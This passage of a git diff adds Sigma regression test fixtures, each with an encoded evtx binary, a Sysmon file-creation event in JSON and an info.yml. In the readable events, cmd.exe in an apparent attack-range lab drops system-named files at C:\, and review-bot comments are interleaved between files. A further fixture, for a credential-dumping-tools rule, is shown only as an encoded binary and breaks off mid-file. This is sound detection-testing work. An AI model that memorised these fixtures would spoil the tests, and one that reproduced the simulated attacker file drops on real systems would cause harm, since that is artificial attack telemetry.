diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d4e9307b52d29f8a8bbaa56e417c3e86a45963bc GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json new file mode 100644 index 000000000..53d3796c2 
--- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:00.601559Z" + } + }, + "EventRecordID": 23503, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:00.589", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\tdh.dll", + "CreationUtcTime": "2025-10-24 23:41:00.589", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml new file mode 100644 index 000000000..3039b03b8 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml 
@@ -0,0 +1,13 @@ +id: 61017761-38ab-4224-a43f-6cc53b67e374 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e + title: Files With System DLL Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx 
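Review bot: only a `Positive Detection Test` is declared for this rule, and the single event in the companion JSON (cmd.exe creating `C:\tdh.dll`) covers one DLL name at the drive root. For a rule whose title hinges on "Unsuspected Locations", a second sample with the same filename written to an expected location and `match_count: 0` would guard the rule's filters as well as its selection; as written, a regression that widens the rule to fire on legitimate paths would pass this CI check. `description: N/A` should also be replaced with a short note on how the sample was produced.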
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..074dcff33f82169cf0f8fcb2a5d35c84302802ba GIT binary patch literal 69632 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 K1h;X4;QkAcKe2}Z literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json new file mode 100644 index 000000000..75ad05708 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:48.497170Z" + } + }, + "EventRecordID": 24322, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:48.482", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\bitsadmin.exe", + "CreationUtcTime": "2025-10-24 23:41:48.482", + "User": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml new file mode 100644 index 000000000..858e84b3a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml @@ -0,0 +1,13 @@ +id: e0123384-7d25-4178-b011-c1d37394d8dc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d + title: Files With System Process Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx 
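Review bot: `description: N/A` again. The companion JSON shows exactly what was simulated (cmd.exe writing `C:\bitsadmin.exe`), and the event carries the same `ProcessGuid` `5AA13A44-0C90-68FC-BF1D-000000004002` as the `tdh.dll` sample in the previous fixture, i.e. both were generated from one cmd.exe session in the attack range. Recording that in the description helps when the two evtx files need to be regenerated together, and makes it obvious that the two positive tests are not independent samples.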
diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b1b8d69f5c646cc8540abaa7b8ab58dbe0c6e725 GIT binary patch literal 69632 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 